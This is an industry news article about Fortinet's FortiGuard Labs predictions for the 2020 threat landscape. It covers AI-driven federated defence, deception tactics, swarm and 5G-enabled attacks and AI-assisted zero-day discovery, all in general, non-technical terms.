Fortinet, the automated cyber security solutions business, has unveiled predictions from the FortiGuard Labs team about the threat landscape for 2020 and beyond. These predictions reveal methods that Fortinet anticipates cyber criminals will employ in the near future, along with important strategies that will help organisations to protect against these oncoming attacks.
Cyber attack methodologies have become more sophisticated in recent years, in turn magnifying their effectiveness and speed. This trend looks likely to continue unless more organisations make a shift as to how they think about their security strategies. With the volume, velocity and sophistication of today’s global threat landscape, organisations must be able to respond in real-time and at machine speed to effectively counter aggressive attacks. Advances in Artificial Intelligence (AI) and threat intelligence will be vital in this fight.
One of the objectives of developing security-focused AI over time has been to create an adaptive immune system for the network similar to the one in the human body. The first generation of AI was designed to use machine learning models to learn, correlate and then determine a specific course of action. The second generation of AI leverages its increasingly sophisticated ability to detect patterns to significantly enhance elements like access control by distributing learning nodes across an environment.
The third generation of AI is where, rather than relying on a central, monolithic processing centre, AI will interconnect its regional learner nodes such that locally collected data can be shared, correlated and analysed in a more distributed manner. This will be a very important development as organisations look to secure their expanding edge environments.
Federated machine learning
In addition to leveraging traditional forms of threat intelligence pulled from feeds or derived from internal traffic and data analysis, machine learning will eventually rely on a flood of relevant information coming from new edge devices to local learning nodes.
By tracking and correlating this real-time information, an AI system will not only be able to generate a more complete view of the threat landscape, but also refine how local systems can respond to local events. AI systems will be able to see, correlate, track and prepare for threats by sharing information across the network. Eventually, a federated learning system will allow data sets to be interconnected so that learning models can adapt to changing environments and event trends and an event, at one point, improves the intelligence of the entire system.
Investing in AI not only allows organisations to automate tasks, but it can also enable an automated system that can look for and discover attacks after the fact and before they occur. Combining machine learning with statistical analysis will allow organisations to develop customised action planning tied to AI to enhance threat detection and response. These threat playbooks could uncover underlying patterns that enable the AI system to predict an attacker’s next move, forecast where the next attack is likely to occur and even determine which threat actors are the most likely culprits.
If this information is then added into an AI learning system, remote learning nodes will be able to provide advanced and proactive protection wherein they not only detect a threat, but also forecast movements, proactively intervene and coordinate with other nodes to simultaneously shut down all avenues of attack.
Opportunity in counter-intelligence and deception
One of the most critical resources in the world of espionage is counter-intelligence, and the same is true when attacking or defending an environment where moves are being carefully monitored. Defenders have a distinct advantage with access to the sorts of threat intelligence that cyber criminals generally don’t, which can be augmented with machine learning and AI.
The use of increased deception technologies could spark a counter-intelligence retaliation by cyber adversaries. In this case, attackers will need to learn to differentiate between legitimate and deceptive traffic without becoming caught simply for spying on traffic patterns. Organisations will be able to effectively counter this strategy by adding playbooks and more pervasive AI to their deception strategies. This strategy will not only detect criminals looking to identify legitimate traffic, but also improve the deceptive traffic such that it becomes impossible to differentiate from legitimate transactions.
Eventually, organisations could respond to any counter-intelligence efforts before they happen, enabling them to maintain a position of superior control.
Cyber security has unique requirements related to things like privacy and access, while cyber crime has no borders. As a result, law enforcement organisations are not only establishing global Command Centres, but have also begun connecting them to the private sector so they’re one step closer to seeing and responding to cyber criminals in real-time. A fabric of law enforcement as well as public and private sector relationships can help in terms of identifying and responding to cyber criminals. Initiatives that foster a more unified approach to bridge the gaps between different international and local law enforcement agencies, Governments, businesses and security experts will help expedite the timely and secure exchange of information to protect critical infrastructure against cyber crime.
Cyber adversary sophistication “not slowing down”
Changes in strategy will not pass by without a response from cyber adversaries. For networks and organisations using sophisticated methods to detect and respond to attacks, the response might be for criminals to attempt to reply with something even stronger. Combined with more sophisticated attack methods, the expanding potential attack surface and more intelligent AI-enabled systems, the cyber criminals’ sophistication is not decreasing.
A recent Fortinet Threat Landscape Report demonstrates a rise in the use of advanced evasion techniques designed to prevent detection, disable security functions and devices and operate under the radar using ‘living off the land’ strategies by exploiting existing installed software and disguising malicious traffic as legitimate. Many modern malware tools already incorporate features for evading anti-virus or other threat detection measures, but cyber adversaries are becoming more sophisticated in their obfuscation and anti-analysis practices to avoid detection. Such strategies maximise weaknesses in security resources and staffing.
Over the past few years, the rise of swarm technology (which can leverage things like machine learning and AI to attack networks and devices) has shown new potential. Advances in swarm technology have powerful implications in the fields of medicine, transportation, engineering and automated problem solving. However, if used maliciously, it may also be a game-changer for adversaries if organisations don’t update their security strategies. When used by cyber criminals, bot swarms could be employed to infiltrate a network, overwhelm internal defences and efficiently find and extract data. Eventually, specialist bots, armed with specific functions, will be able to share and correlate intelligence gathered in real-time to accelerate a swarm’s ability to select and modify attacks to compromise a target (or even multiple targets simultaneously).
The advent of 5G may end up being the initial catalyst for the development of functional swarm-based attacks. This could be enabled by the ability to create local ad hoc networks that can quickly share and process information and applications. By weaponising 5G and edge computing, individually exploited devices could become a conduit for malicious code, while groups of compromised devices could work in concert to target victims at 5G speeds. Given the speed, intelligence and localised nature of such an attack, legacy security technologies could be challenged to effectively fight off such a persistent strategy.
Traditionally, finding and developing an exploit for a zero-day vulnerability was expensive, so criminals typically hoard them until their existing portfolio of attacks is neutralised. With the expanding attack surface, an increase in the ease of discovery, and as a result, in the volume of potentially exploitable zero-day vulnerabilities is on the horizon.
AI fuzzing and zero-day mining have the ability to exponentially increase the volume of zero-day attacks as well. Security measures will need to be in place to counter this trend.